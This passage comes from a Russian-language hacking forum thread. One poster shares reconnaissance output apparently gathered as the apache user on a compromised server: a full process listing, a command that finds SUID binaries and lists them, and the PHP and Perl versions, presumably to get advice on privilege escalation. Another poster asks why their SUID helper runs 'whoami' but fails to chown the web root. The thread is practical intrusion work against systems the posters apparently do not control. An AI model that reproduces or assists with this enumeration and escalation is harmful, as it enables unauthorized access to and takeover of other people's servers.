root       107  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [aio/6]
root       108  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [aio/7]
root       109  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [crypto/0]
root       110  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [crypto/1]
root       111  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [crypto/2]
root       112  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [crypto/3]
root       113  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [crypto/4]
root       114  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [crypto/5]
root       115  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [crypto/6]
root       116  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [crypto/7]
root       121  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kthrotld/0]
root       122  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kthrotld/1]
root       123  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kthrotld/2]
root       124  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kthrotld/3]
root       125  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kthrotld/4]
root       126  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kthrotld/5]
root       127  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kthrotld/6]
root       128  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kthrotld/7]
root       154  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kpsmoused]
root       155  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [usbhid_resumer]
root       185  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kstriped]
root       212  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [i915]
root       396  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [scsi_eh_0]
root       397  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [scsi_eh_1]
root       398  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [scsi_eh_2]
root       399  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [scsi_eh_3]
root       400  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [scsi_eh_4]
root       401  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [scsi_eh_5]
root       450  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [scsi_eh_6]
root       451  0.0  0.0      0     0 ?        S    Jun28   0:17  \_ [usb-storage]
root       517  0.0  0.0      0     0 ?        S    Jun28   0:19  \_ [md0_raid1]
root       522  0.6  0.0      0     0 ?        D    Jun28 1445:53  \_ [md1_raid1]
root       555  0.0  0.0      0     0 ?        S    Jun28   0:49  \_ [kdmflush]
root       557  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kdmflush]
root       559  0.0  0.0      0     0 ?        S    Jun28   1:12  \_ [kdmflush]
root       561  0.0  0.0      0     0 ?        S    Jun28   1:06  \_ [kdmflush]
root       563  0.0  0.0      0     0 ?        S    Jun28   0:42  \_ [kdmflush]
root       616  0.0  0.0      0     0 ?        S    Jun28   7:30  \_ [jbd2/dm-0-8]
root       617  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root       618  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root       619  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root       620  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root       621  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root       622  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root       623  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root       624  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root       893  0.0  0.0      0     0 ?        S    Jun28   2:31  \_ [flush-253:0]
root      1081  0.0  0.0      0     0 ?        S    Jun28  86:21  \_ [kondemand/0]
root      1082  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kondemand/1]
root      1083  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kondemand/2]
root      1084  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kondemand/3]
root      1085  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kondemand/4]
root      1086  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kondemand/5]
root      1087  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kondemand/6]
root      1088  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [kondemand/7]
root      1114  0.0  0.0      0     0 ?        S    Jun28   6:33  \_ [jbd2/dm-2-8]
root      1115  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1116  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1117  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1118  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1119  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1120  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1121  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1122  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1123  0.0  0.0      0     0 ?        S    Jun28  12:55  \_ [jbd2/dm-3-8]
root      1124  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1125  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1126  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1127  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1128  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1129  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1130  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1131  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1132  0.0  0.0      0     0 ?        S    Jun28   5:32  \_ [jbd2/dm-4-8]
root      1133  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1134  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1135  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1136  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1137  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1138  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1139  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1140  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [ext4-dio-unwrit]
root      1143  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfs_mru_cache]
root      1144  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfslogd/0]
root      1145  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfslogd/1]
root      1146  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfslogd/2]
root      1147  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfslogd/3]
root      1148  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfslogd/4]
root      1149  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfslogd/5]
root      1150  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfslogd/6]
root      1151  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfslogd/7]
root      1152  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsdatad/0]
root      1153  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsdatad/1]
root      1154  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsdatad/2]
root      1155  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsdatad/3]
root      1156  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsdatad/4]
root      1157  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsdatad/5]
root      1158  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsdatad/6]
root      1159  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsdatad/7]
root      1160  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsconvertd/0]
root      1161  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsconvertd/1]
root      1162  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsconvertd/2]
root      1163  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsconvertd/3]
root      1164  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsconvertd/4]
root      1165  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsconvertd/5]
root      1166  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsconvertd/6]
root      1167  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsconvertd/7]
root      1168  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsbufd/sdc]
root      1169  0.0  0.0      0     0 ?        S    Jun28   0:09  \_ [xfssyncd/sdc]
root      1170  0.0  0.0      0     0 ?        S    Jun28   0:00  \_ [xfsaild/sdc]
root      1226  0.0  0.0      0     0 ?        S    Jun28   1:05  \_ [kauditd]
root      1359  0.0  0.0      0     0 ?        S    Jun28  11:44  \_ [flush-253:2]
root      1360  0.0  0.0      0     0 ?        S    Jun28   4:26  \_ [flush-253:3]
root      1361  0.0  0.0      0     0 ?        S    Jun28   2:31  \_ [flush-253:4]
root      4199  0.0  0.0      0     0 ?        S    18:27   0:00  \_ [flush-9:0]
root         1  0.0  0.0  19228  1140 ?        Ss   Jun28   0:17 /sbin/init
root       697  0.0  0.0  11048  1024 ?        S<s  Jun28   0:00 /sbin/udevd -d
root      1674  0.0  0.0  11044   996 ?        S<   Jun28   0:00  \_ /sbin/udevd -d
root      1675  0.0  0.0  11044   996 ?        S<   Jun28   0:00  \_ /sbin/udevd -d
root      1453  0.0  0.0  93196   880 ?        S<sl Jun28   3:37 auditd
root      1469  0.0  0.0 249852  7908 ?        Sl   Jun28   4:24 /sbin/rsyslogd -i /var/run/syslogd.pid -c 5
root      1483  0.0  0.0   4652   628 ?        Ss   Jun28   0:01 mdadm --monitor --scan -f --pid-file=/var/run/mdadm/mdadm.pid
root      1506  0.0  0.0   4076   628 ?        Ss   Jun28   0:00 /usr/sbin/acpid
root      1523  0.0  0.0  64072  1176 ?        Ss   Jun28   1:16 /usr/sbin/sshd
root      1614  0.0  0.0  91988  3804 ?        Ss   Jun28   2:45 /usr/libexec/postfix/master
postfix   1623  0.0  0.0  92276  3980 ?        S    Jun28   0:11  \_ qmgr -l -t fifo -u
postfix  17633  0.0  0.0  92088  3880 ?        S    17:25   0:00  \_ anvil -l -t unix -u
postfix  22625  0.0  0.0  94816  4984 ?        S    17:45   0:00  \_ smtpd -n smtp -t inet -u -o stress=
postfix  22626  0.0  0.0  92104  3828 ?        S    17:45   0:00  \_ trivial-rewrite -n rewrite -t unix -u
postfix  31243  0.0  0.0  92096  3788 ?        S    18:05   0:00  \_ pickup -l -t fifo -u
postfix    888  0.0  0.0  94812  4936 ?        S    18:14   0:00  \_ smtpd -n smtp -t inet -u -o stress=
root      1633  0.0  0.0 117244  1340 ?        Ss   Jun28   0:40 crond
root      1654  0.0  0.1  60392 20444 ?        Ss   Jun28   5:25 /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
root      1662  0.0  0.0   4060   596 tty1     Ss+  Jun28   0:00 /sbin/mingetty /dev/tty1
root      1664  0.0  0.0   4060   592 tty2     Ss+  Jun28   0:00 /sbin/mingetty /dev/tty2
root      1666  0.0  0.0   4060   592 tty3     Ss+  Jun28   0:00 /sbin/mingetty /dev/tty3
root      1668  0.0  0.0   4060   596 tty4     Ss+  Jun28   0:00 /sbin/mingetty /dev/tty4
root      1670  0.0  0.0   4060   596 tty5     Ss+  Jun28   0:00 /sbin/mingetty /dev/tty5
root      1672  0.0  0.0   4060   596 tty6     Ss+  Jun28   0:00 /sbin/mingetty /dev/tty6
root      6561  0.0  0.0 106192  1536 ?        S    Jun28   0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --pid-file=/var/run/mysqld/mysqld.pid --basedir=/usr --user=mysql
mysql     6780  7.7  1.6 4539548 271264 ?      Sl   Jun28 17929:55  \_ /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/lib/mysql/mysql.sock
root      9771  0.0  0.0  52120   800 ?        Ss   Oct07   0:17 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf
root     11249  0.0  0.0 365824 15256 ?        Ss   Nov22   1:36 /usr/sbin/httpd
apache   32504  0.1  0.1 471740 20912 ?        S    18:10   0:02  \_ /usr/sbin/httpd
apache    1355  0.2  0.1 473236 20080 ?        S    18:15   0:02  \_ /usr/sbin/httpd
apache    1620  0.1  0.1 471944 21100 ?        S    18:16   0:01  \_ /usr/sbin/httpd
apache    1904  0.1  0.1 474396 21212 ?        S    18:17   0:01  \_ /usr/sbin/httpd
apache    2859  0.0  0.1 373584 19212 ?        S    18:21   0:00  \_ /usr/sbin/httpd
apache    3178  0.1  0.1 377436 20968 ?        S    18:23   0:01  \_ /usr/sbin/httpd
apache    3376  0.1  0.1 371956 18656 ?        S    18:23   0:00  \_ /usr/sbin/httpd
apache    3399  0.1  0.1 375224 20604 ?        S    18:23   0:00  \_ /usr/sbin/httpd
apache    3733  0.1  0.1 375136 20324 ?        S    18:25   0:00  \_ /usr/sbin/httpd
apache    3746  0.1  0.1 375344 20828 ?        S    18:25   0:00  \_ /usr/sbin/httpd
apache    3796  0.1  0.0 469148 16272 ?        S    18:25   0:00  \_ /usr/sbin/httpd
apache    3831  0.1  0.1 373176 19612 ?        S    18:25   0:00  \_ /usr/sbin/httpd
apache    3832  0.2  0.1 472720 21560 ?        S    18:25   0:00  \_ /usr/sbin/httpd
apache    3874  0.1  0.1 377532 21068 ?        S    18:25   0:00  \_ /usr/sbin/httpd
apache    4040  0.2  0.1 374136 17828 ?        S    18:26   0:00  \_ /usr/sbin/httpd
apache    4056  0.1  0.1 374076 19536 ?        S    18:26   0:00  \_ /usr/sbin/httpd
apache    4057  0.0  0.1 372256 18960 ?        S    18:26   0:00  \_ /usr/sbin/httpd
apache    4142  0.0  0.1 373272 19332 ?        S    18:27   0:00  \_ /usr/sbin/httpd
apache    4158  0.2  0.1 375636 20724 ?        S    18:27   0:00  \_ /usr/sbin/httpd
apache    4325  0.0  0.1 372516 19248 ?        S    18:27   0:00  \_ /usr/sbin/httpd
apache    4334  0.0  0.1 372048 17524 ?        S    18:27   0:00  \_ /usr/sbin/httpd
apache    4335  0.0  0.1 371800 16848 ?        S    18:27   0:00  \_ /usr/sbin/httpd
apache    4337  0.1  0.2 387412 32856 ?        S    18:27   0:00  \_ /usr/sbin/httpd
apache    4459  0.0  0.1 372796 19348 ?        S    18:28   0:00  \_ /usr/sbin/httpd
apache    4491  0.0  0.1 371108 16952 ?        S    18:28   0:00  \_ /usr/sbin/httpd
apache    4554  0.0  0.0 369040 15640 ?        S    18:28   0:00  \_ /usr/sbin/httpd
apache    4563  0.1  0.1 371536 16948 ?        S    18:28   0:00  \_ /usr/sbin/httpd
apache    4564  0.1  0.1 373860 19376 ?        S    18:28   0:00  \_ /usr/sbin/httpd
apache    4565  0.1  0.1 376200 19844 ?        S    18:28   0:00  \_ /usr/sbin/httpd
apache    4568  0.0  0.1 375352 20224 ?        S    18:28   0:00  \_ /usr/sbin/httpd
apache    4569  0.3  0.1 473780 20960 ?        S    18:28   0:00  \_ /usr/sbin/httpd
apache    4570  0.0  0.1 472300 20528 ?        S    18:28   0:00  \_ /usr/sbin/httpd
apache    4571  0.3  0.2 388692 34160 ?        S    18:28   0:00  \_ /usr/sbin/httpd
apache    4599  0.1  0.1 372796 18860 ?        S    18:28   0:00  \_ /usr/sbin/httpd
apache    4606  0.1  0.1 373032 19548 ?        S    18:28   0:00  \_ /usr/sbin/httpd
apache    4780  0.1  0.1 377432 20664 ?        S    18:29   0:00  \_ /usr/sbin/httpd
apache    4784  0.1  0.1 373760 19328 ?        S    18:29   0:00  \_ /usr/sbin/httpd
apache    4792  0.2  0.1 375332 20500 ?        S    18:29   0:00  \_ /usr/sbin/httpd
apache    4968  0.2  0.1 377968 21180 ?        S    18:30   0:00  \_ /usr/sbin/httpd
apache    5032  0.2  0.1 389768 32476 ?        S    18:30   0:00  \_ /usr/sbin/httpd
apache    5063  0.1  0.1 373276 19784 ?        S    18:31   0:00  \_ /usr/sbin/httpd
apache    5101  0.1  0.1 374460 19788 ?        S    18:31   0:00  \_ /usr/sbin/httpd
apache    5106  0.1  0.1 371136 17548 ?        S    18:31   0:00  \_ /usr/sbin/httpd
apache    5107  0.1  0.0 369556 16208 ?        S    18:31   0:00  \_ /usr/sbin/httpd
apache    5113  0.1  0.1 371648 17956 ?        S    18:31   0:00  \_ /usr/sbin/httpd
apache    5115  0.1  0.0 369812 15992 ?        S    18:31   0:00  \_ /usr/sbin/httpd
apache    5228  0.3  0.1 373276 19256 ?        S    18:31   0:00  \_ /usr/sbin/httpd
apache    5266  0.5  0.1 383560 29716 ?        S    18:32   0:00  \_ /usr/sbin/httpd
apache    5271  0.0  0.0 365824  8932 ?        S    18:32   0:00  \_ /usr/sbin/httpd
apache    5272  0.1  0.0 367808 13772 ?        S    18:32   0:00  \_ /usr/sbin/httpd
apache    5276  1.1  0.1 376660 19432 ?        S    18:32   0:00  \_ /usr/sbin/httpd
apache    5277  0.3  0.1 373020 18752 ?        S    18:32   0:00  \_ /usr/sbin/httpd
apache    5278  0.5  0.1 381752 26852 ?        S    18:32   0:00  \_ /usr/sbin/httpd
apache    5279  0.5  0.1 383564 29312 ?        S    18:32   0:00  \_ /usr/sbin/httpd
apache    5286  0.1  0.0 368520 13508 ?        S    18:32   0:00  \_ /usr/sbin/httpd
apache    5300  0.4  0.1 373008 18604 ?        S    18:32   0:00  \_ /usr/sbin/httpd
apache    5305  0.5  0.0 369440 15384 ?        S    18:32   0:00  \_ /usr/sbin/httpd
apache    5306  0.8  0.1 373016 19456 ?        S    18:32   0:00  \_ /usr/sbin/httpd
apache    5333  0.0  0.0  13644  1356 ?        R    18:32   0:00  |   \_ ps axfu
apache    5328  0.0  0.0 365956  9500 ?        S    18:32   0:00  \_ /usr/sbin/httpd
find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rwsr-xr-x 1 root root 34840 Apr 16 2012 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 10272 Apr 16 2012 /sbin/pam_timestamp_check
-rwsr-xr-x 1 root root 9000 Sep 17 2012 /usr/sbin/usernetctl
-r-s--x--- 1 root apache 14032 Oct 7 2012 /usr/sbin/suexec
-rwsr-xr-x 1 root root 224912 Nov 9 2012 /usr/libexec/openssh/ssh-keysign
-rws--x--x 1 root root 14280 Nov 1 2012 /usr/libexec/pt_chown
---s--x--x 1 root root 219272 Aug 6 2012 /usr/bin/sudo
-rwsr-xr-x 1 root root 66352 Dec 7 2011 /usr/bin/chage
-rwsr-xr-x 1 root root 30768 Feb 22 2012 /usr/bin/passwd
-rwsr-xr-x 1 root root 36144 Dec 7 2011 /usr/bin/newgrp
-rwsr-xr-x 1 root root 71480 Dec 7 2011 /usr/bin/gpasswd
---s--x--x 1 root root 219272 Aug 6 2012 /usr/bin/sudoedit
-rws--x--x 1 root root 20184 Nov 5 2012 /usr/bin/chfn
-rwsr-xr-x 1 root root 47520 Jul 19 2011 /usr/bin/crontab
-rws--x--x 1 root root 20056 Nov 5 2012 /usr/bin/chsh
-rwsr-xr-x 1 root root 36488 Jul 19 2011 /bin/ping6
-rwsr-xr-x 1 root root 40760 Jul 19 2011 /bin/ping
-rwsr-xr-x 1 root root 34904 Jun 22 2012 /bin/su
-rwsr-xr-x 1 root root 76056 Nov 5 2012 /bin/mount
-rwsr-xr-x 1 root root 50496 Nov 5 2012 /bin/umount

php -v
PHP 5.3.18 (cli) (built: Nov 4 2012 21:09:33)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies
with Suhosin v0.9.33, Copyright (c) 2007-2012, by SektionEins GmbH


perl -v

This is perl, v5.10.1 (*) built for x86_64-linux-thread-multi

Copyright 1987-2009, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl". If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.

Последний раз редактировалось OxoTnik; 04.12.2013 в 17:44..
OxoTnik вне форума   Ответить с цитированием
Старый 05.12.2013, 10:41   #1019
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

OxoTnik
https://rdot.org/forum/showthread.php?t=2720
SynQ вне форума   Ответить с цитированием
Старый 05.12.2013, 14:51   #1020
vonkolot
 
Регистрация: 10.04.2013
Сообщений: 11
Репутация: 0
По умолчанию

Есть суидник комманду ./suid "whoami" выполняет нормально, а вот например пытаюсь изменить права на каталог..пишу
./suid "chown 48:48 /var/www/html/site/www" не работает...и вообще кроме ./suid "whoami" походу другие комманды не выполняются,помогите пожалуйста. Все папки и файлы в каталое /var/www/html/ созданы от рута. Не могу изменить. Такое ощущение,что ковычки экранируются.

Последний раз редактировалось vonkolot; 05.12.2013 в 15:55..
vonkolot вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot